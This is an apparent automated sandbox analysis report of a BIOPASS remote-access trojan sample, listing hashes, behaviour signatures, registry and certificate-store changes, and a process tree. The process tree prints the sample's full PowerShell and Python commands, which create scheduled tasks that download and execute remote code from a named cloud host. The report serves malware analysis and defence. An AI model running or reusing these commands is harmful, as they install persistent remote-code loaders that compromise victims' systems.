biopass | fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851

Analysis

max time kernel
69s
max time network
151s
platform
windows7_x64
resource
win7v20210408
submitted
12/07/2021, 07:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe
Size

4.7MB
MD5

f12a1c138bc56653a09076cba61d392d
SHA1

f20a850162677f244aead08cceae74ecbb5dff37
SHA256

fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851
SHA512

814146e040c905ef10002d9f9edc3b39445aa06070f0934b6b58801eca8cc29838e84b87ab5d9cdc3883bc8cef38a0b7ac4daa0a50c4cb32010977f3d99e8488

Score

10^/10

biopass rat trojan

Malware Config

Signatures

biopass
BIOPASS is a RAT connected with Winnti group (APT41).
rat trojan biopass

Executes dropped EXE 3 IoCs

pid	Process
1384	ServiceHub.Host.CLR.exe
628	flash.exe
1028	ServiceHub.Host.CLR.exe

Loads dropped DLL 64 IoCs

pid	Process
824	taskeng.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1384	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe
1028	ServiceHub.Host.CLR.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	6	Go-http-client/1.1

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	flash.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	flash.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	flash.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	flash.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	flash.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	flash.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1988	ping.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
628	powershell.exe
628	powershell.exe
980	powershell.exe
980	powershell.exe
112	powershell.exe
112	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	628	powershell.exe
Token: 35	1384	ServiceHub.Host.CLR.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: 35	1028	ServiceHub.Host.CLR.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
628	flash.exe
628	flash.exe
628	flash.exe
628	flash.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 1100 wrote to memory of 1988	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	26
PID 1100 wrote to memory of 1988	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	26
PID 1100 wrote to memory of 1988	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	26
PID 1100 wrote to memory of 1988	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	26
PID 1100 wrote to memory of 1052	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	31
PID 1100 wrote to memory of 1052	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	31
PID 1100 wrote to memory of 1052	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	31
PID 1100 wrote to memory of 1052	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	31
PID 1100 wrote to memory of 560	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	33
PID 1100 wrote to memory of 560	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	33
PID 1100 wrote to memory of 560	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	33
PID 1100 wrote to memory of 560	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	33
PID 560 wrote to memory of 628	560	cmd.exe	35
PID 560 wrote to memory of 628	560	cmd.exe	35
PID 560 wrote to memory of 628	560	cmd.exe	35
PID 560 wrote to memory of 628	560	cmd.exe	35
PID 560 wrote to memory of 1724	560	cmd.exe	36
PID 560 wrote to memory of 1724	560	cmd.exe	36
PID 560 wrote to memory of 1724	560	cmd.exe	36
PID 560 wrote to memory of 1724	560	cmd.exe	36
PID 1100 wrote to memory of 1656	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	38
PID 1100 wrote to memory of 1656	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	38
PID 1100 wrote to memory of 1656	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	38
PID 1100 wrote to memory of 1656	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	38
PID 1656 wrote to memory of 980	1656	cmd.exe	40
PID 1656 wrote to memory of 980	1656	cmd.exe	40
PID 1656 wrote to memory of 980	1656	cmd.exe	40
PID 1656 wrote to memory of 980	1656	cmd.exe	40
PID 824 wrote to memory of 1384	824	taskeng.exe	41
PID 824 wrote to memory of 1384	824	taskeng.exe	41
PID 824 wrote to memory of 1384	824	taskeng.exe	41
PID 1656 wrote to memory of 524	1656	cmd.exe	42
PID 1656 wrote to memory of 524	1656	cmd.exe	42
PID 1656 wrote to memory of 524	1656	cmd.exe	42
PID 1656 wrote to memory of 524	1656	cmd.exe	42
PID 1656 wrote to memory of 1576	1656	cmd.exe	44
PID 1656 wrote to memory of 1576	1656	cmd.exe	44
PID 1656 wrote to memory of 1576	1656	cmd.exe	44
PID 1656 wrote to memory of 1576	1656	cmd.exe	44
PID 824 wrote to memory of 628	824	taskeng.exe	43
PID 824 wrote to memory of 628	824	taskeng.exe	43
PID 824 wrote to memory of 628	824	taskeng.exe	43
PID 824 wrote to memory of 628	824	taskeng.exe	43
PID 1100 wrote to memory of 620	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	45
PID 1100 wrote to memory of 620	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	45
PID 1100 wrote to memory of 620	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	45
PID 1100 wrote to memory of 620	1100	fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe	45
PID 620 wrote to memory of 112	620	cmd.exe	47
PID 620 wrote to memory of 112	620	cmd.exe	47
PID 620 wrote to memory of 112	620	cmd.exe	47
PID 620 wrote to memory of 112	620	cmd.exe	47
PID 620 wrote to memory of 1616	620	cmd.exe	48
PID 620 wrote to memory of 1616	620	cmd.exe	48
PID 620 wrote to memory of 1616	620	cmd.exe	48
PID 620 wrote to memory of 1616	620	cmd.exe	48
PID 824 wrote to memory of 1028	824	taskeng.exe	49
PID 824 wrote to memory of 1028	824	taskeng.exe	49
PID 824 wrote to memory of 1028	824	taskeng.exe	49

C:\Users\Admin\AppData\Local\Temp\fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe
"C:\Users\Admin\AppData\Local\Temp\fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1100
- C:\Windows\SysWOW64\ping.exe
  ping baidu.com
  2⤵
  - Runs ping.exe
  PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Public\vc.exe /install /quiet /norestart"
  2⤵
  PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:628
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /Run /TN SYSTEM_SETTINGS
    3⤵
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\flash.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\flash.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:980
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /Run /TN SYSTEM_TEST
    3⤵
    PID:524
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /DELETE /F /TN SYSTEM_TEST
    3⤵
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /Run /TN SYSTEM_CDAEMON
    3⤵
    PID:1616

C:\Windows\system32\taskeng.exe
taskeng.exe {40054A11-7CF3-4EA4-B8D9-2FB99B02E492} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:824
- C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
  C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\')).read().decode())')" a a
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Users\Public\flash.exe
  C:\Users\Public\flash.exe
  2⤵
  - Executes dropped EXE
  - Modifies Internet Explorer settings
  - Modifies system certificate store
  - Suspicious use of SetWindowsHookEx
  PID:628
- C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
  C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\')).read().decode())')" a a
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:1028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/112-176-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/112-178-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/112-172-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/112-173-0x00000000048E0000-0x00000000048E1000-memory.dmp

Filesize
4KB

Download
memory/112-174-0x00000000048E2000-0x00000000048E3000-memory.dmp

Filesize
4KB

Download
memory/112-175-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/628-86-0x0000000006270000-0x0000000006271000-memory.dmp

Filesize
4KB

Download
memory/628-67-0x0000000004892000-0x0000000004893000-memory.dmp

Filesize
4KB

Download
memory/628-66-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/628-65-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/628-68-0x0000000001100000-0x0000000001101000-memory.dmp

Filesize
4KB

Download
memory/628-64-0x0000000004890000-0x0000000004891000-memory.dmp

Filesize
4KB

Download
memory/628-63-0x0000000075AF1000-0x0000000075AF3000-memory.dmp

Filesize
8KB

Download
memory/628-69-0x0000000004770000-0x0000000004771000-memory.dmp

Filesize
4KB

Download
memory/628-72-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/628-77-0x0000000005690000-0x0000000005691000-memory.dmp

Filesize
4KB

Download
memory/628-78-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/628-79-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/628-87-0x00000000062A0000-0x00000000062A1000-memory.dmp

Filesize
4KB

Download
memory/628-177-0x00000000000F0000-0x00000000000F3000-memory.dmp

Filesize
12KB

Download
memory/980-157-0x0000000000F80000-0x0000000000F81000-memory.dmp

Filesize
4KB

Download
memory/980-162-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/980-158-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/980-161-0x0000000005200000-0x0000000005201000-memory.dmp

Filesize
4KB

Download
